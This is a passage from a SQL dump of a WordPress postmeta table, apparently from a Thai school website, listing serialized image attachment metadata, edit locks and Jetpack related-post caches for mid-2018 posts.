\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(7359, 3163, '_thumbnail_id', '3164'),
(7363, 3163, '_hide_featured', NULL),
(7364, 3163, '_wpas_done_all', '1'),
(7365, 3167, '_edit_lock', '1529566871:3'),
(7366, 3167, '_edit_last', '3'),
(7367, 3168, '_wp_attached_file', '2018/06/35552190_603055720070620_4596052994599944192_o.jpg'),
(7368, 3168, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1761;s:6:\"height\";i:1295;s:4:\"file\";s:58:\"2018/06/35552190_603055720070620_4596052994599944192_o.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:58:\"35552190_603055720070620_4596052994599944192_o-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:58:\"35552190_603055720070620_4596052994599944192_o-300x221.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:221;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:58:\"35552190_603055720070620_4596052994599944192_o-768x565.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:565;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:59:\"35552190_603055720070620_4596052994599944192_o-1024x753.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:753;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:58:\"35552190_603055720070620_4596052994599944192_o-400x294.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:294;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(7369, 3167, '_thumbnail_id', '3168'),
(7373, 3167, '_hide_featured', NULL),
(7374, 3167, '_wpas_done_all', '1'),
(7375, 3171, '_edit_lock', '1529567530:3'),
(7376, 3171, '_edit_last', '3'),
(7377, 3171, '_oembed_fb160f06529e5a30bed8f1d7205956ec', '{{unknown}}'),
(7378, 3172, '_wp_attached_file', '2018/06/6-20-2018-11-43-01-PM.png'),
(7379, 3172, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:612;s:6:\"height\";i:881;s:4:\"file\";s:33:\"2018/06/6-20-2018-11-43-01-PM.png\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:33:\"6-20-2018-11-43-01-PM-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:33:\"6-20-2018-11-43-01-PM-208x300.png\";s:5:\"width\";i:208;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:33:\"6-20-2018-11-43-01-PM-208x300.png\";s:5:\"width\";i:208;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(7380, 3159, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575607339;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:5948;}i:1;a:1:{s:2:\"id\";i:6074;}i:2;a:1:{s:2:\"id\";i:3993;}}}}'),
(7381, 3173, '_wp_attached_file', '2018/06/35924276_604082353301290_2762178413920780288_o.jpg'),
(7382, 3173, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1295;s:6:\"height\";i:673;s:4:\"file\";s:58:\"2018/06/35924276_604082353301290_2762178413920780288_o.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:58:\"35924276_604082353301290_2762178413920780288_o-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:58:\"35924276_604082353301290_2762178413920780288_o-300x156.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:156;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:58:\"35924276_604082353301290_2762178413920780288_o-768x399.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:399;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:59:\"35924276_604082353301290_2762178413920780288_o-1024x532.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:532;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:58:\"35924276_604082353301290_2762178413920780288_o-400x208.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:208;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(7383, 3171, '_thumbnail_id', '3173'),
(7387, 3171, '_hide_featured', NULL),
(7388, 3171, '_wpas_done_all', '1'),
(7389, 3176, '_edit_lock', '1529571565:3'),
(7390, 3176, '_edit_last', '3'),
(7395, 3176, '_hide_featured', NULL),
(7396, 3176, '_wpas_done_all', '1'),
(7397, 3176, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575275213;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:5469;}i:1;a:1:{s:2:\"id\";i:4093;}i:2;a:1:{s:2:\"id\";i:4020;}}}}'),
(7398, 3171, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575659359;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:5865;}i:1;a:1:{s:2:\"id\";i:5900;}i:2;a:1:{s:2:\"id\";i:6141;}}}}'),
(7401, 3180, '_edit_lock', '1529572160:3'),
(7402, 3180, '_edit_last', '3'),
(7403, 3181, '_wp_attached_file', '2018/06/35761525_604240736618785_4388481709130121216_o.jpg'),
(7404, 3181, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1944;s:6:\"height\";i:1296;s:4:\"file\";s:58:\"2018/06/35761525_604240736618785_4388481709130121216_o.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:58:\"35761525_604240736618785_4388481709130121216_o-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:58:\"35761525_604240736618785_4388481709130121216_o-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:58:\"35761525_604240736618785_4388481709130121216_o-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:59:\"35761525_604240736618785_4388481709130121216_o-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:58:\"35761525_604240736618785_4388481709130121216_o-400x267.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:267;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(7405, 3180, '_thumbnail_id', '3181'),
(7409, 3180, '_hide_featured', NULL),
(7410, 3180, '_wpas_done_all', '1'),
(7413, 3167, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575324403;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:4023;}i:1;a:1:{s:2:\"id\";i:4632;}i:2;a:1:{s:2:\"id\";i:4701;}}}}'),
(7414, 3163, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575738617;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:5301;}i:1;a:1:{s:2:\"id\";i:5865;}i:2;a:1:{s:2:\"id\";i:3968;}}}}'),
(7415, 3180, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575407843;s:7:\"payload\";a:0:{}}}'),
(7416, 3155, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575240371;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:4961;}i:1;a:1:{s:2:\"id\";i:6176;}i:2;a:1:{s:2:\"id\";i:4017;}}}}'),
(7417, 3151, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575702853;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:5194;}i:1;a:1:{s:2:\"id\";i:5169;}i:2;a:1:{s:2:\"id\";i:4166;}}}}'),
(7418, 3147, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575660127;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:6085;}i:1;a:1:{s:2:\"id\";i:3954;}i:2;a:1:{s:2:\"id\";i:4026;}}}}'),
(7419, 3143, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575328292;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:6308;}i:1;a:1:{s:2:\"id\";i:4701;}i:2;a:1:{s:2:\"id\";i:5179;}}}}'),
(7420, 3138, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575718460;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:4033;}i:1;a:1:{s:2:\"id\";i:5822;}i:2;a:1:{s:2:\"id\";i:5900;}}}}'),
(7421, 3133, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575171366;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:3988;}i:1;a:1:{s:2:\"id\";i:3954;}i:2;a:1:{s:2:\"id\";i:5197;}}}}'),
(7422, 3129, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575574982;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:6156;}i:1;a:1:{s:2:\"id\";i:5769;}i:2;a:1:{s:2:\"id\";i:6147;}}}}'),
(7423, 3125, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575575293;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:5936;}i:1;a:1:{s:2:\"id\";i:6040;}i:2;a:1:{s:2:\"id\";i:4964;}}}}'),
(7424, 2712, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1574502568;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:6154;}i:1;a:1:{s:2:\"id\";i:4735;}i:2;a:1:{s:2:\"id\";i:6141;}}}}'),
(7425, 3184, '_edit_lock', '1529646906:3'),
(7426, 3184, '_edit_last', '3'),
(7427, 3185, '_wp_attached_file', '2018/06/ประกาศ-รายชื่อผู้ชนะครุภัณฑ์-แผนกคอมพิวเตอร์ธุรกิจ-จำนวน-3-รายการ.pdf'),
(7431, 3184, '_hide_featured', NULL),
(7432, 3184, '_wpas_done_all', '1'),
(7433, 3184, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575122523;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:5680;}i:1;a:1:{s:2:\"id\";i:4781;}i:2;a:1:{s:2:\"id\";i:5952;}}}}'),
(7434, 3191, '_edit_lock', '1529909631:3'),
(7435, 3191, '_edit_last', '3'),
(7436, 3192, '_wp_attached_file', '2018/06/35922397_604249966617862_3267679700834582528_o.jpg'),
(7437, 3192, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1296;s:6:\"height\";i:864;s:4:\"file\";s:58:\"2018/06/35922397_604249966617862_3267679700834582528_o.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:58:\"35922397_604249966617862_3267679700834582528_o-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:58:\"35922397_604249966617862_3267679700834582528_o-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:58:\"35922397_604249966617862_3267679700834582528_o-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:59:\"35922397_604249966617862_3267679700834582528_o-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:58:\"35922397_604249966617862_3267679700834582528_o-400x267.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:267;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(7438, 3191, '_thumbnail_id', '3192'),
(7442, 3191, '_hide_featured', NULL),
(7443, 3191, '_wpas_done_all', '1'),
(7444, 3196, '_wp_attached_file', '2018/06/25-6-2561-13-20-05.jpg'),
(7445, 3196, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:965;s:6:\"height\";i:155;s:4:\"file\";s:30:\"2018/06/25-6-2561-13-20-05.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"25-6-2561-13-20-05-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"25-6-2561-13-20-05-300x48.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:30:\"25-6-2561-13-20-05-768x123.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:123;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:29:\"25-6-2561-13-20-05-400x64.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:64;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(7446, 3200, '_edit_lock', '1625545481:14'),
(7447, 3200, '_edit_last', '14'),
(7448, 3201, '_wp_attached_file', '2018/06/25-6-2561-13-48-51.jpg'),
(7449, 3201, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:188;s:6:\"height\";i:239;s:4:\"file\";s:30:\"2018/06/25-6-2561-13-48-51.jpg\";s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"25-6-2561-13-48-51-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(7450, 3202, '_wp_attached_file', '2018/06/25-6-2561-13-58-08.jpg'),
(7451, 3202, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:580;s:6:\"height\";i:157;s:4:\"file\";s:30:\"2018/06/25-6-2561-13-58-08.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"25-6-2561-13-58-08-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"25-6-2561-13-58-08-300x81.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:81;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:30:\"25-6-2561-13-58-08-400x108.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:108;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(7452, 3203, '_wp_attached_file', '2018/06/25-6-2561-13-58-25.jpg'),
(7453, 3203, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:954;s:6:\"height\";i:330;s:4:\"file\";s:30:\"2018/06/25-6-2561-13-58-25.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"25-6-2561-13-58-25-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:30:\"25-6-2561-13-58-25-300x104.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:104;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:30:\"25-6-2561-13-58-25-768x266.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:266;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:30:\"25-6-2561-13-58-25-400x138.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:138;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(7454, 3200, '_hide_featured', NULL),
(7455, 3206, '_edit_lock', '1529918634:3'),
(7456, 3206, '_edit_last', '3');
INSERT INTO `wp_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES
(7457, 3191, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1574680324;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:5865;}i:1;a:1:{s:2:\"id\";i:6068;}i:2;a:1:{s:2:\"id\";i:5948;}}}}'),
(7458, 3207, '_wp_attached_file', '2018/06/25-6-2561-15-49-38.jpg'),
(7459, 3207, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:195;s:6:\"height\";i:241;s:4:\"file\";s:30:\"2018/06/25-6-2561-15-49-38.jpg\";s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"25-6-2561-15-49-38-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(7460, 3208, '_wp_attached_file', '2018/06/25-6-2561-15-49-50.jpg'),
(7461, 3208, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:581;s:6:\"height\";i:158;s:4:\"file\";s:30:\"2018/06/25-6-2561-15-49-50.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"25-6-2561-15-49-50-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"25-6-2561-15-49-50-300x82.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:82;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:30:\"25-6-2561-15-49-50-400x109.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:109;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(7462, 3209, '_wp_attached_file', '2018/06/25-6-2561-15-57-57.jpg'),
(7463, 3209, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:958;s:6:\"height\";i:329;s:4:\"file\";s:30:\"2018/06/25-6-2561-15-57-57.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"25-6-2561-15-57-57-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:30:\"25-6-2561-15-57-57-300x103.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:103;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:30:\"25-6-2561-15-57-57-768x264.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:264;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:30:\"25-6-2561-15-57-57-400x137.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:137;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(7470, 3206, '_hide_featured', NULL),
(7471, 3217, '_edit_lock', '1541737100:3'),
(7472, 3217, '_edit_last', '3'),
(7473, 3217, '_hide_featured', NULL),
(7474, 3220, '_edit_lock', '1541742951:3'),
(7475, 3220, '_edit_last', '3'),
(7476, 3220, '_hide_featured', NULL),
(7477, 3224, '_edit_lock', '1530067201:3'),
(7478, 3224, '_edit_last', '3'),
(7479, 3225, '_wp_attached_file', '2018/06/27-6-2561-9-34-46.jpg'),
(7480, 3225, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:412;s:6:\"height\";i:684;s:4:\"file\";s:29:\"2018/06/27-6-2561-9-34-46.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"27-6-2561-9-34-46-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"27-6-2561-9-34-46-181x300.jpg\";s:5:\"width\";i:181;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:29:\"27-6-2561-9-34-46-181x300.jpg\";s:5:\"width\";i:181;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(7484, 3224, '_hide_featured', NULL),
(7485, 3224, '_wpas_done_all', '1'),
(7486, 3228, '_wp_attached_file', '2018/06/36300534_608923609483831_6523644088095342592_o.jpg'),
